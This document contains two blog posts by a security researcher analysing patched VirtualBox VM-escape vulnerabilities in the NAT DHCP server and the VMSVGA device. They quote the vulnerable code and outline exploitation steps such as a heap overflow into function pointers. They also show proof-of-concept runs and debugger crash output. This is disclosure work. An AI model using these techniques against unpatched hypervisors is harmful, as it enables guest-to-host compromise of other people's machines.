Wednesday, November 21, 2018

VirtualBox NAT DHCP/BOOTP server vulnerabilities

Continuing from my previous blog posts, this is another old set of VirtualBox bugs which can lead to VM escape. VirtualBox guest in NAT mode (default networking configuration) enables a per VM DHCP server which assigns IP address to guest.
renorobert@ubuntuguest:~$ ifconfig enp0s3
enp0s3    Link encap:Ethernet  HWaddr 08:00:27:b8:b7:4c  
          inet addr:10.0.2.15  Bcast:10.0.2.255  Mask:255.255.255.0
          inet6 addr: fe80::a00:27ff:feb8:b74c/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:119 errors:0 dropped:0 overruns:0 frame:0
          TX packets:94 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:11737 (11.7 KB)  TX bytes:12157 (12.1 KB)
The emulated DHCP server runs in IP address 10.0.2.2. Packets sent to this DHCP server gets parsed by host worker process
renorobert@ubuntuguest:~$ sudo nmap -sU -p 68 10.0.2.2
. . .
68/udp open|filtered dhcpc
MAC Address: 52:54:00:12:35:03 (QEMU virtual NIC)
Oracle fixed 2 of my bugs CVE-2016-5610 and CVE-2016-5611 during Oracle Critical Patch Update - October 2016. The bug affects VirtualBox versions prior to 5.0.28 and 5.1.8 in code src/Vbox/Devices/Network/slirp/bootp.c

DHCP packet is defined in src/Vbox/Devices/Network/slirp/bootp.h as below:
#define DHCP_OPT_LEN            312

/* RFC 2131 */
struct bootp_t
{
    struct ip      ip;                          /**< header: IP header */
    struct udphdr  udp;                         /**< header: UDP header */
    uint8_t        bp_op;                       /**< opcode (BOOTP_REQUEST, BOOTP_REPLY) */
    uint8_t        bp_htype;                    /**< hardware type */
    uint8_t        bp_hlen;                     /**< hardware address length */
    uint8_t        bp_hops;                     /**< hop count */
    uint32_t       bp_xid;                      /**< transaction ID */
    uint16_t       bp_secs;                     /**< numnber of seconds */
    uint16_t       bp_flags;                    /**< flags (DHCP_FLAGS_B) */
    struct in_addr bp_ciaddr;                   /**< client IP address */
    struct in_addr bp_yiaddr;                   /**< your IP address */
    struct in_addr bp_siaddr;                   /**< server IP address */
    struct in_addr bp_giaddr;                   /**< gateway IP address */
    uint8_t        bp_hwaddr[16];               /** client hardware address */
    uint8_t        bp_sname[64];                /** server host name */
    uint8_t        bp_file[128];                /** boot filename */
    uint8_t        bp_vend[DHCP_OPT_LEN];       /**< vendor specific info */
};
The DHCP server maintains an array of BOOTPClient structure (bootp.c), to keep track of all assigned IP addresses.
/** Entry in the table of known DHCP clients. */
typedef struct
{
    uint32_t xid;
    bool allocated;
    uint8_t macaddr[6];
    struct in_addr addr;
    int number;
} BOOTPClient;

/** Number of DHCP clients supported by NAT. */
#define NB_ADDR     16
The array is initialized during VM initialization using bootp_dhcp_init()
int bootp_dhcp_init(PNATState pData)
{
    pData->pbootp_clients = RTMemAllocZ(sizeof(BOOTPClient) * NB_ADDR);
    if (!pData->pbootp_clients)
        return VERR_NO_MEMORY;

    return VINF_SUCCESS;
}
CVE-2016-5611 - Out-of-bounds read vulnerability in dhcp_find_option
static uint8_t *dhcp_find_option(uint8_t *vend, uint8_t tag)
{
    uint8_t *q = vend;
    uint8_t len;
    . . .
    while(*q != RFC1533_END)          // expects  END tag in an untrusted input 
    {
        if (*q == RFC1533_PAD)
        {
            q++;   // incremented without validation 
            continue;
        }
        if (*q == tag)
            return q;   // returns pointer if tag found
        q++;
        len = *q;    
        q += 1 + len;   // length and pointer not validated
    }
    return NULL;
} 
dhcp_find_option() parses the guest provided bp_vend field in DHCP packet. However, lack of proper validation could return a pointer outside the DHCP packet buffer or crash the VM if the while loop never terminates until an unmapped address is accessed. One interesting code path to trigger info leak using this bug is by DHCP decline packets.
bootp.c:65:static uint8_t *dhcp_find_option(uint8_t *vend, uint8_t tag)
bootp.c:412:    req_ip = dhcp_find_option(&bp->bp_vend[0], RFC2132_REQ_ADDR);
bootp.c:413:    server_ip = dhcp_find_option(&bp->bp_vend[0], RFC2132_SRV_ID);
bootp.c:701:    pu8RawDhcpObject = dhcp_find_option(bp->bp_vend, RFC2132_MSG_TYPE);
bootp.c:726:        parameter_list = dhcp_find_option(&bp->bp_vend[0], RFC2132_PARAM_LIST);
bootp.c:773:            pu8RawDhcpObject = dhcp_find_option(&bp->bp_vend[0], RFC2132_REQ_ADDR);
static void dhcp_decode(PNATState pData, struct bootp_t *bp, const uint8_t *buf, int size)
{
. . .
        case DHCPDECLINE:
            /* note: pu8RawDhcpObject doesn't point to DHCP header, now it's expected it points
             * to Dhcp Option RFC2132_REQ_ADDR
             */
            pu8RawDhcpObject = dhcp_find_option(&bp->bp_vend[0], RFC2132_REQ_ADDR);
 . . .
            req_ip.s_addr = *(uint32_t *)(pu8RawDhcpObject + 2);
            rc = bootp_cache_lookup_ether_by_ip(pData, req_ip.s_addr, NULL);
            if (RT_FAILURE(rc))
            {
                . . .
                bc->addr.s_addr = req_ip.s_addr;
                slirp_arp_who_has(pData, bc->addr.s_addr);
                LogRel(("NAT: %RTnaipv4 has been already registered\n", req_ip));
            }
            /* no response required */
            break;
. . .
A DHCPDECLINE message is sent by a client suggesting the provided IP address is already in use. This IP address is part of the bp_vend field. The server calls dhcp_find_option() to get a pointer to the IP address within bp_vend field. Here a pointer outside the DHCP buffer can be returned, pointing to some junk data as IP address.

The server first checks if the IP address is already in assigned list by calling bootp_cache_lookup_ether_by_ip(). If not, it further invokes slirp_arp_who_has() to generated an ARP request with bytes read outside DHCP buffer as IP address. This request will be received by the guest since its a broadcast packet leaking some bytes.

To trigger the issue, send a DHCPDECLINE packet with bp_vend filled with RFC1533_PAD. If there is no crash, an ARP packet will be triggered like below:
renorobert@guest:~$ sudo tcpdump -vv -i eth0 arp
[sudo] password for renorobert:
tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes
15:51:34.557995 ARP, Ethernet (len 6), IPv4 (len 4), Request who-has 45.103.99.109 (Broadcast) tell 10.0.2.2, length 46
45.103.99.109 are the leaked host process bytes. Link to proof-of-concept code can be found at the end of blog post.

CVE-2016-5610 – Heap overflow in dhcp_decode_request()
static int dhcp_decode_request(PNATState pData, struct bootp_t *bp, struct mbuf *m)
{
. . .
    /*?? renewing ??*/
    switch (dhcp_stat)
    {
        case RENEWING:
 . . .
               Assert((bp->bp_hlen == ETH_ALEN));
               memcpy(bc->macaddr, bp->bp_hwaddr, bp->bp_hlen);
               bc->addr.s_addr = bp->bp_ciaddr.s_addr;
            }
            break;

        case INIT_REBOOT:
 . . .
            Assert((bp->bp_hlen == ETH_ALEN));
            memcpy(bc->macaddr, bp->bp_hwaddr, bp->bp_hlen);
            bc->addr.s_addr = ui32;
            break;
. . .
}
When parsing DHCPREQUEST packets, the bp->bp_hlen field is not validated. The assert statement Assert((bp->bp_hlen == ETH_ALEN)) is compiled out of release builds, leading to heap buffer overflow when copying bp_hwaddr from untrusted DHCP packet to the macaddr field in BOOTPClient structure.

bp_hlen is only a byte, hence the maximum value can be 255. However, size of BOOTPClient structure array is greater than 300 bytes. Overflowing within this array is not very interesting as there is no critical data to corrupt. In order to make this overflow interesting, we have to reach to the end of BOOTPClient structure array (pbootp_clients).

pbootp_clients array can store information about 16 client requests [0...15]. The first element is already used during VM initialization with the guest IP address. To advance further into the array, the guest can send another 14 DHCPREQUEST packets with unique information. When handling the 15th DHCPREQUEST packet trigger the overflow by setting bp_hlen to maximum value.

Since pbootp_clients is allocated early during the VM initialization process and overflow is limited to a max of 255 bytes, the adjacent buffer needs to be something interesting. When testing VirtualBox 5.0.26 in Ubuntu 16.04, the adjacent buffer was a uma_zone structure defined in src/Vbox/Devices/Network/slirp/zone.h
# define ZONE_MAGIC 0xdead0002
struct uma_zone
{
    uint32_t magic;
    PNATState pData; /* to minimize changes in the rest of UMA emulation code */
    RTCRITSECT csZone;
    const char *name;
    size_t size; /* item size */
    ctor_t pfCtor;
    dtor_t pfDtor;
    zinit_t pfInit;
    zfini_t pfFini;
    uma_alloc_t pfAlloc;
    uma_free_t pfFree;
    int max_items;
    int cur_items;
    LIST_HEAD(RT_NOTHING, item) used_items;
    LIST_HEAD(RT_NOTHING, item) free_items;
    uma_zone_t master_zone;
    void *area;
    /** Needs call pfnXmitPending when memory becomes available if @c true.
     * @remarks Only applies to the master zone (master_zone == NULL) */
    bool fDoXmitPending;
};
This structure gets used in functions defined in src/Vbox/Devices/Network/slirp/misc.c. Corrupting pfCtor, pfDtor, pfInit, pfFini, pfAlloc or pfFree gives RIP control in NAT thread or the per vCPU EMT thread.

$ sudo ./poc enp0s3
[sudo] password for renorobert: 
poc: [+] Using interface enp0s3...
poc: [+] Sending DHCP requests...
poc: [+] Current IP address : 10.0.2.15
poc: [+] Requesting IP address : 10.0.2.16
poc: [+] Requesting IP address : 10.0.2.17
poc: [+] Requesting IP address : 10.0.2.18
poc: [+] Requesting IP address : 10.0.2.19
poc: [+] Requesting IP address : 10.0.2.20
poc: [+] Requesting IP address : 10.0.2.21
poc: [+] Requesting IP address : 10.0.2.22
poc: [+] Requesting IP address : 10.0.2.23
poc: [+] Requesting IP address : 10.0.2.24
poc: [+] Requesting IP address : 10.0.2.25
poc: [+] Requesting IP address : 10.0.2.26
poc: [+] Requesting IP address : 10.0.2.27
poc: [+] Requesting IP address : 10.0.2.28
poc: [+] Requesting IP address : 10.0.2.29
poc: [+] Requesting IP address : 10.0.2.30
poc: [+] Overflowing bootp_clients into uma_zone structure…
gdb-peda$ c
Continuing.

Thread 11 "EMT" received signal SIGSEGV, Segmentation fault.
[Switching to Thread 0x7fd20e4af700 (LWP 27148)]

[----------------------------------registers-----------------------------------]
RAX: 0xfffffe95 
RBX: 0x7fd1f05ea330 ("CCCCCCCC", 'B' , "\b")
RCX: 0x0 
RDX: 0x0 
RSI: 0x42424242 ('BBBB')
RDI: 0x7fd1f05ea330 ("CCCCCCCC", 'B' , "\b")
RBP: 0x7fd20e4aeb70 --> 0x7fd20e4aebd0 --> 0x7fd20e4aec10 --> 0x7fd20e4aecd0 --> 0x7fd20e4aece0 --> 0x7fd20e4aed40 (--> ...)
RSP: 0x7fd20e4aeb50 --> 0x7fd1f05e7160 --> 0x0 
RIP: 0x7fd1df22308e (call   QWORD PTR [rbx+0x70])
R8 : 0x0 
R9 : 0x0 
R10: 0x7fd20d529230 --> 0x7fd1df1e5be0 (push   rbp)
R11: 0x0 
R12: 0x7fd1f0852080 --> 0x800 
R13: 0x7fd20e4aeb90 --> 0x100000002 
R14: 0x7fd1f05ea340 ('B' , "\b")
R15: 0x7fd1f05e6f30 --> 0x7fd1df21c5a0 (push   rbp)
EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x7fd1df223086: xor    edx,edx
   0x7fd1df223088: mov    esi,DWORD PTR [rbx+0x48]
   0x7fd1df22308b: mov    rdi,rbx
=> 0x7fd1df22308e: call   QWORD PTR [rbx+0x70]
   0x7fd1df223091: test   rax,rax
   0x7fd1df223094: mov    r12,rax
   0x7fd1df223097: je     0x7fd1df2230b5
   0x7fd1df223099: mov    rax,QWORD PTR [rbx+0x50]
Guessed arguments:
arg[0]: 0x7fd1f05ea330 ("CCCCCCCC", 'B' , "\b")
arg[1]: 0x42424242 ('BBBB')
arg[2]: 0x0 
arg[3]: 0x0 
[------------------------------------stack-------------------------------------]
0000| 0x7fd20e4aeb50 --> 0x7fd1f05e7160 --> 0x0 
0008| 0x7fd20e4aeb58 --> 0x7fd1f0852080 --> 0x800 
0016| 0x7fd20e4aeb60 --> 0x7fd1f0852088 --> 0x7fd1dd262f88 --> 0x8ffffffffffff 
0024| 0x7fd20e4aeb68 --> 0x11a 
0032| 0x7fd20e4aeb70 --> 0x7fd20e4aebd0 --> 0x7fd20e4aec10 --> 0x7fd20e4aecd0 --> 0x7fd20e4aece0 --> 0x7fd20e4aed40 (--> ...)
0040| 0x7fd20e4aeb78 --> 0x7fd1df22339f (test   rax,rax)
0048| 0x7fd20e4aeb80 --> 0x7fd20e4aebb0 --> 0x0 
0056| 0x7fd20e4aeb88 --> 0x7fd1f0000020 --> 0x200000000 
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x00007fd1df22308e in ?? () from /usr/lib/virtualbox/VBoxDD.so

gdb-peda$ x/gx $rbx+0x70
0x7fd1f05ea3a0: 0xdeadbeef00000000

The proof of concept code for both the bugs can be found at virtualbox-nat-dhcp-bugs

Sunday, November 11, 2018

VirtualBox VMSVGA VM Escape

VirtualBox emulates VMware virtual SVGA device whose interface details and programming model is available publicly [2]. Moreover, the paper “GPU Virtualization on VMware’s Hosted I/O Architecture” [1] is a great reference to the architecture of VMware SVGA device. Kostya Kortchinsky first published “CLOUDBURST - A VMware Guest to Host Escape Story” [3] detailing a VM escape using bugs in VMware SVGA device.

Similarly Oracle also fixed a bunch of issues in their VMSVGA device (CVE-2014-6595, CVE-2014-6588, CVE-2014-6589, CVE-2014-6590, CVE-2015-0427) during the Critical Patch Update - January 2015 [6]. “Attacking hypervisors through hardware emulation” [4] has some details regarding the VMSVGA bugs in VirtualBox.

It is important to note that VMSVGA device is not enabled by default and probably has very limited users. However, the feature can be enabled as mentioned in the documentation of VBoxManage [5].

VBoxManage modifyvm VMNAME --graphicscontroller vmsvga
Oracle fixed VMSVGA bugs CVE-2017-10210, CVE-2017-10236, CVE-2017-10239, CVE-2017-10240, CVE-2017-10392, CVE-2017-10407 and CVE-2017-10408 which I reported, during the Critical Patch Updates in July 2017 [7] and October 2017 [8]. CVE-2017-10210, CVE-2017-10236, CVE-2017-10239 and CVE-2017-10240 was also found by Li Qiang of the Qihoo 360 Gear Team [7]. This blog post details some of these issues and demonstrate a VM escape using them.

Analysis was carried out in VirtualBox version 5.1.22 for OSX. VirtualBox for Linux is not built with support for VMSVGA 3D features and are available only in Windows and OSX.

CVE-2017-10210 - Integer overflow in validating face[0].numMipLevels in vmsvga3dSurfaceDefine (DevVGA-SVGA3d.cpp)

int vmsvga3dSurfaceDefine(PVGASTATE pThis, uint32_t sid, uint32_t surfaceFlags, SVGA3dSurfaceFormat format,
                          SVGA3dSurfaceFace face[SVGA3D_MAX_SURFACE_FACES], uint32_t multisampleCount,
                          SVGA3dTextureFilter autogenFilter, uint32_t cMipLevels, SVGA3dSize *paMipLevelSizes)
{
    . . .
    /* cFaces must be 6 for a cubemap and 1 otherwise. */
    AssertReturn(cFaces == (uint32_t)((surfaceFlags & SVGA3D_SURFACE_CUBEMAP) ? 6 : 1), VERR_INVALID_PARAMETER);
    AssertReturn(cMipLevels == cFaces * face[0].numMipLevels, VERR_INVALID_PARAMETER);
    . . .
}
Here “cFaces” can be set to 6 when using “surfaceflag” SVGA3D_SURFACE_CUBEMAP. Then “face[0].numMipLevels” can be set to a value such that cFaces * face[0].numMipLevels wraps. “cMipLevels” depends on number of SVGA3dSize structures passed for SVGA_3D_CMD_SURFACE_DEFINE command e.g. 2 == 6 * 0x2aaaaaab

face[0].numMipLevels value is used in multiple other commands leading to memory corruption. The PoC for CVE-2017-10210 demonstrates memory corruption using SVGA_3D_CMD_SURFACE_DESTROY command leading to invalid free().

int vmsvga3dSurfaceDestroy(PVGASTATE pThis, uint32_t sid)
{
. . .
        if (pSurface->pMipmapLevels)
        {
            for (uint32_t face=0; face < pSurface->cFaces; face++)
            {
                for (uint32_t i=0; i < pSurface->faces[face].numMipLevels; i++)
                {
                    uint32_t idx = i + face * pSurface->faces[0].numMipLevels;
                    if (pSurface->pMipmapLevels[idx].pSurfaceData)
                        RTMemFree(pSurface->pMipmapLevels[idx].pSurfaceData);
                }
            }
            RTMemFree(pSurface->pMipmapLevels);
        }
. . .
}

renorobert@ubuntu:~/virtualbox-vmsvga-bugs/CVE-2017-10210$ sudo ./poc 
[sudo] password for renorobert: 
poc: [+] Triggering the integer overflow using SVGA_3D_CMD_SURFACE_DEFINE...
poc: [+] Triggering the crash using SVGA_3D_CMD_SURFACE_DESTROY...

 [lldbinit] process attach --pid 57984
[-] warning: get_frame() failed. Is the target binary started?
Process 57984 stopped
* thread #1, queue = 'com.apple.main-thread', stop reason = signal SIGSTOP
    frame #0: 0x00007fff5f9ae20a libsystem_kernel.dylib`mach_msg_trap + 10
Target 0: (VirtualBoxVM) stopped.

Executable module set to "/Applications/VirtualBox.app/Contents/Resources/VirtualBoxVM.app/Contents/MacOS/VirtualBoxVM".
Architecture set to: x86_64h-apple-macosx.
[lldbinit] c
Process 57984 resuming
-----------------------------------------------------------------------------------------------------------------------[regs]
  RAX: 0x0000000000000000  RBX: 0x000070000E657000  RBP: 0x000070000E656CC0  RSP: 0x000070000E656C88  o d I t s z a P c
  RDI: 0x000000000000DB0B  RSI: 0x0000000000000006  RDX: 0x0000000000000000  RCX: 0x000070000E656C88  RIP: 0x00007FFF5F9B7B66
  R8:  0x0000000000000000  R9:  0x0000000000000000  R10: 0x0000000000000000  R11: 0x0000000000000206  R12: 0x000000000000DB0B
  R13: 0x0000000000000004  R14: 0x0000000000000006  R15: 0x000000000000002D
  CS:  0007  FS: 0000  GS: 0000                                              Jump is taken (c = 0)
-----------------------------------------------------------------------------------------------------------------------[flow]
-----------------------------------------------------------------------------------------------------------------------[code]
__pthread_kill @ libsystem_kernel.dylib:
    0x7fff5f9b7b66: 73 08           jae    0x7fff5f9b7b70            ; <+20>
    0x7fff5f9b7b68: 48 89 c7        mov    rdi, rax
    0x7fff5f9b7b6b: e9 79 6f ff ff  jmp    0x7fff5f9aeae9            ; cerror_nocancel
    0x7fff5f9b7b70: c3              ret    
    0x7fff5f9b7b71: 90              nop    
    0x7fff5f9b7b72: 90              nop    
    0x7fff5f9b7b73: 90              nop    

__pthread_markcancel @ libsystem_kernel.dylib:
    0x7fff5f9b7b74: b8 4c 01 00 02  mov    eax, 0x200014c
-----------------------------------------------------------------------------------------------------------------------------

Process 57984 stopped
* thread #21, name = 'VMSVGA FIFO', stop reason = signal SIGABRT
    frame #0: 0x00007fff5f9b7b66 libsystem_kernel.dylib`__pthread_kill + 10
Target 0: (VirtualBoxVM) stopped.
[lldbinit] bt
* thread #21, name = 'VMSVGA FIFO', stop reason = signal SIGABRT
  * frame #0: 0x00007fff5f9b7b66 libsystem_kernel.dylib`__pthread_kill + 10
    frame #1: 0x00007fff5fb82080 libsystem_pthread.dylib`pthread_kill + 333
    frame #2: 0x00007fff5f9131ae libsystem_c.dylib`abort + 127
    frame #3: 0x00007fff5fa11822 libsystem_malloc.dylib`free + 521
    frame #4: 0x000000010efbbad1 VBoxDD.dylib`___lldb_unnamed_symbol1176$$VBoxDD.dylib + 305
    frame #5: 0x000000010efb9932 VBoxDD.dylib`___lldb_unnamed_symbol1168$$VBoxDD.dylib + 3682
    frame #6: 0x00000001053d1683 VBoxVMM.dylib`___lldb_unnamed_symbol649$$VBoxVMM.dylib + 115
    frame #7: 0x00000001032db6dc VBoxRT.dylib`___lldb_unnamed_symbol661$$VBoxRT.dylib + 44
    frame #8: 0x0000000103360222 VBoxRT.dylib`___lldb_unnamed_symbol1110$$VBoxRT.dylib + 194
    frame #9: 0x00007fff5fb7f661 libsystem_pthread.dylib`_pthread_body + 340
    frame #10: 0x00007fff5fb7f50d libsystem_pthread.dylib`_pthread_start + 377
    frame #11: 0x00007fff5fb7ebf9 libsystem_pthread.dylib`thread_start + 13
[lldbinit]


CVE-2017-10236 – paMipLevelSizes is not validated leading to integer overflow in vmsvga3dSurfaceDefine (DevVGA-SVGA3d.cpp)

    /* Allocate buffer to hold the surface data until we can move it into a D3D object */
    for (uint32_t i = 0; i < cMipLevels; ++i)
    {
        PVMSVGA3DMIPMAPLEVEL pMipmapLevel = &pSurface->pMipmapLevels[i];
        . . .
        pMipmapLevel->cbSurfacePitch = pSurface->cbBlock * pMipmapLevel->size.width;
        pMipmapLevel->cbSurface      = pMipmapLevel->cbSurfacePitch * pMipmapLevel->size.height * pMipmapLevel->size.depth;
        pMipmapLevel->pSurfaceData   = RTMemAllocZ(pMipmapLevel->cbSurface);
        AssertReturn(pMipmapLevel->pSurfaceData, VERR_NO_MEMORY);
    }
Here “cbSurfacePitch” and “cbSurface” calculations can overflow since “paMipLevelSizes” values are fully controlled by guest. Further RTMemAllocZ ends up allocating less buffer size than actually needed (due to invalid calculation of “cbSurface”). This could lead to out of bound read/write during usage of “pSurfaceData” in other SVGA commands. The provided PoC only demonstrates an invalid allocation which can be inspected in a debugger and does not trigger any crashes. However, this bug will be later used in the full VM escape exploit.

CVE-2017-10240 and CVE-2017-10408 – Multiple integer overflows in vmsvga3dSurfaceDMA (DevVGA-SVGA3d.cpp)

int vmsvga3dSurfaceDMA(PVGASTATE pThis, SVGA3dGuestImage guest, SVGA3dSurfaceImageId host, SVGA3dTransferType transfer,
                       uint32_t cCopyBoxes, SVGA3dCopyBox *paBoxes)
{
. . .
       for (unsigned i = 0; i < cCopyBoxes; i++)
        {
            . . .
            if (paBoxes[i].x + paBoxes[i].w > pMipLevel->size.width)
                paBoxes[i].w = pMipLevel->size.width - paBoxes[i].x;
            if (paBoxes[i].y + paBoxes[i].h > pMipLevel->size.height)
                paBoxes[i].h = pMipLevel->size.height - paBoxes[i].y;
            if (paBoxes[i].z + paBoxes[i].d > pMipLevel->size.depth)
                paBoxes[i].d = pMipLevel->size.depth - paBoxes[i].z;

            if (    !paBoxes[i].w
                ||  !paBoxes[i].h
                ||  !paBoxes[i].d
                ||   paBoxes[i].x > pMipLevel->size.width
                ||   paBoxes[i].y > pMipLevel->size.height
                ||   paBoxes[i].z > pMipLevel->size.depth)
            {
                . . .
                continue;
            }
            uDestOffset = paBoxes[i].x * pSurface->cbBlock + paBoxes[i].y * pMipLevel->cbSurfacePitch + paBoxes[i].z * pMipLevel->size.height * pMipLevel->cbSurfacePitch;
            AssertReturn(uDestOffset + paBoxes[i].w * pSurface->cbBlock * paBoxes[i].h * paBoxes[i].d <= pMipLevel->cbSurface, VERR_INTERNAL_ERROR);
. . .
}
In this case, first the “paBoxes” validation against “pMipLevel” can overflow leading to bypasses. Then “uDestOffset” validation against “pMipLevel->cbSurface” can also be bypassed due to integer overflow. Similar code patterns were found in multiple places. “uDestOffset” is used for computing “pBufferStart” argument during the call to vmsvgaGMRTransfer, leading to out of bound read or write based on the value of SVGA3dTransferType - SVGA3D_WRITE_HOST_VRAM or SVGA3D_READ_HOST_VRAM. The PoC for this bug accesses memory at an offset ~4GB from pMipLevel->pSurfaceData leading to crash. This bug can be exploited by spraying the heap and allocating the accessed memory region.

renorobert@ubuntu:~/virtualbox-vmsvga-bugs/CVE-2017-10240+10408$ make
gcc -Wall -ggdb -std=gnu99 -o poc svga.c poc.c -lpciaccess
renorobert@ubuntu:~/virtualbox-vmsvga-bugs/CVE-2017-10240+10408$ sudo ./poc 
[sudo] password for renorobert:

[lldbinit] process attach --pid 14518
[-] warning: get_frame() failed. Is the target binary started?
Process 14518 stopped
* thread #1, queue = 'com.apple.main-thread', stop reason = signal SIGSTOP
    frame #0: 0x00007fff5f9ae20a libsystem_kernel.dylib`mach_msg_trap + 10
Target 0: (VirtualBoxVM) stopped.

Executable module set to "/Applications/VirtualBox.app/Contents/Resources/VirtualBoxVM.app/Contents/MacOS/VirtualBoxVM".
Architecture set to: x86_64h-apple-macosx.
[lldbinit] c
Process 14518 resuming
-----------------------------------------------------------------------------------------------------------------------[regs]
  RAX: 0x00007F976656CEB8  RBX: 0x0000000111C1C000  RBP: 0x00007000066CAC10  RSP: 0x00007000066CAC10  o d I t s Z a P c
  RDI: 0x00007F976656CEB8  RSI: 0x0000000111C1C000  RDX: 0x0000000000000000  RCX: 0x4141414141414141  RIP: 0x00007FFF5FB78FD0
  R8:  0x4141414141414141  R9:  0x0000000000000000  R10: 0x00000000FFFFFFFE  R11: 0x00007F9654950EB8  R12: 0x0000000000000000
  R13: 0x0000000000000001  R14: 0x00007F976656CEB8  R15: 0x0000000000000001
  CS:  002B  FS: 0000  GS: 0000                                              
-----------------------------------------------------------------------------------------------------------------------[flow]
-----------------------------------------------------------------------------------------------------------------------[code]
_platform_memmove$VARIANT$Haswell @ libsystem_platform.dylib:
    0x7fff5fb78fd0: 48 89 0f     mov    qword ptr [rdi], rcx
    0x7fff5fb78fd3: 4c 89 04 17  mov    qword ptr [rdi + rdx], r8
    0x7fff5fb78fd7: 5d           pop    rbp
    0x7fff5fb78fd8: c3           ret    
    0x7fff5fb78fd9: 48 83 c2 08  add    rdx, 0x8
    0x7fff5fb78fdd: 74 25        je     0x7fff5fb79004            ; <+228>
    0x7fff5fb78fdf: 4d 31 c0     xor    r8, r8
    0x7fff5fb78fe2: 42 8a 0c 06  mov    cl, byte ptr [rsi + r8]
-----------------------------------------------------------------------------------------------------------------------------

Process 14518 stopped
* thread #21, name = 'VMSVGA FIFO', stop reason = EXC_BAD_ACCESS (code=1, address=0x7f976656ceb8)
    frame #0: 0x00007fff5fb78fd0 libsystem_platform.dylib`_platform_memmove$VARIANT$Haswell + 176
Target 0: (VirtualBoxVM) stopped.
[lldbinit] vmmap -a 0x00007F976656CEB8
[lldbinit] bt
* thread #21, name = 'VMSVGA FIFO', stop reason = EXC_BAD_ACCESS (code=1, address=0x7f976656ceb8)
  * frame #0: 0x00007fff5fb78fd0 libsystem_platform.dylib`_platform_memmove$VARIANT$Haswell + 176
    frame #1: 0x0000000110e1a6bf VBoxDD.dylib`___lldb_unnamed_symbol1154$$VBoxDD.dylib + 671
    frame #2: 0x0000000110e2207d VBoxDD.dylib`___lldb_unnamed_symbol1178$$VBoxDD.dylib + 861
    frame #3: 0x0000000110e1fa09 VBoxDD.dylib`___lldb_unnamed_symbol1168$$VBoxDD.dylib + 3897
    frame #4: 0x0000000107a17683 VBoxVMM.dylib`___lldb_unnamed_symbol649$$VBoxVMM.dylib + 115
    frame #5: 0x00000001059216dc VBoxRT.dylib`___lldb_unnamed_symbol661$$VBoxRT.dylib + 44
    frame #6: 0x00000001059a6222 VBoxRT.dylib`___lldb_unnamed_symbol1110$$VBoxRT.dylib + 194
    frame #7: 0x00007fff5fb7f661 libsystem_pthread.dylib`_pthread_body + 340
    frame #8: 0x00007fff5fb7f50d libsystem_pthread.dylib`_pthread_start + 377
    frame #9: 0x00007fff5fb7ebf9 libsystem_pthread.dylib`thread_start + 13
[lldbinit]


CVE-2017-10407 - Integer overflow in vmsvgaGMRTransfer (DevVGA-SVGA.cpp)

int vmsvgaGMRTransfer(PVGASTATE pThis, const SVGA3dTransferType enmTransferType, uint8_t *pbDst, int32_t cbDestPitch,
                      SVGAGuestPtr src, uint32_t offSrc, int32_t cbSrcPitch, uint32_t cbWidth, uint32_t cHeight)
{
. . .
        AssertMsgReturn(offSrc + cbSrcPitch * (cHeight - 1) + cbWidth <= pThis->vram_size,
                        ("src.offset=%#x offSrc=%#x cbSrcPitch=%#x cHeight=%#x cbWidth=%#x vram_size=%#x\n",
                         src.offset, offSrc, cbSrcPitch, cHeight, cbWidth, pThis->vram_size),
                        VERR_INVALID_PARAMETER);

        uint8_t *pSrc  = pThis->CTX_SUFF(vram_ptr) + offSrc;
. . .
}
The “offSrc” validation can overflow and the check against “vram_size” can be bypassed. This leads to out of bound read or write relative to the VRAM. vmsvgaGMRTransfer is used by multiple SVGA commands like SVGA_CMD_BLIT_GMRFB_TO_SCREEN, SVGA_3D_CMD_SURFACE_DMA, SVGA_3D_CMD_BLIT_SURFACE_TO_SCREEN etc.

In SVGA_CMD_BLIT_GMRFB_TO_SCREEN, the “offsetDest” is validated against the vram_size. Hence the destination of write can only start from within VRAM buffer. However, the “offsetSource” can end up pointing beyond VRAM buffer at a controlled offset, providing reliable info leak.

case SVGA_CMD_BLIT_GMRFB_TO_SCREEN:
            {
 . . .
                unsigned offsetSource = (pCmd->srcOrigin.x * pSVGAState->GMRFB.format.s.bitsPerPixel) / 8 + pSVGAState->GMRFB.bytesPerLine * pCmd->srcOrigin.y;
                unsigned offsetDest   = (pCmd->destRect.left * RT_ALIGN(pThis->svga.uBpp, 8)) / 8 + pThis->svga.cbScanline * pCmd->destRect.top;
                unsigned cbCopyWidth  = (width * RT_ALIGN(pThis->svga.uBpp, 8)) / 8;

                AssertBreak(offsetDest < pThis->vram_size);

                rc = vmsvgaGMRTransfer(pThis, SVGA3D_WRITE_HOST_VRAM, pThis->CTX_SUFF(vram_ptr) + offsetDest, pThis->svga.cbScanline, pSVGAState->GMRFB.ptr, offsetSource, pSVGAState->GMRFB.bytesPerLine, cbCopyWidth, height);
The PoC provided demonstrates OOB access relative to VRAM using SVGA_CMD_BLIT_GMRFB_TO_SCREEN and SVGA_3D_CMD_SURFACE_DMA.

Exploitation:

There are various bugs providing numerous combinations and primitives. I chose to use the bugs in vmsvga3dSurfaceDefine and vmsvga3dSurfaceDMA to demonstrate a full VM escape:

int vmsvga3dSurfaceDefine(PVGASTATE pThis, uint32_t sid, uint32_t surfaceFlags, SVGA3dSurfaceFormat format,
                          SVGA3dSurfaceFace face[SVGA3D_MAX_SURFACE_FACES], uint32_t multisampleCount,
                          SVGA3dTextureFilter autogenFilter, uint32_t cMipLevels, SVGA3dSize *paMipLevelSizes)
{
. . .
    /* Allocate buffer to hold the surface data until we can move it into a D3D object */
    for (uint32_t i = 0; i < cMipLevels; ++i)
    {
        PVMSVGA3DMIPMAPLEVEL pMipmapLevel = &pSurface->pMipmapLevels[i];
        . . .
        pMipmapLevel->cbSurfacePitch = pSurface->cbBlock * pMipmapLevel->size.width;
        pMipmapLevel->cbSurface      = pMipmapLevel->cbSurfacePitch * pMipmapLevel->size.height * pMipmapLevel->size.depth;
        pMipmapLevel->pSurfaceData   = RTMemAllocZ(pMipmapLevel->cbSurface);
        AssertReturn(pMipmapLevel->pSurfaceData, VERR_NO_MEMORY);
    }
 . . .
}
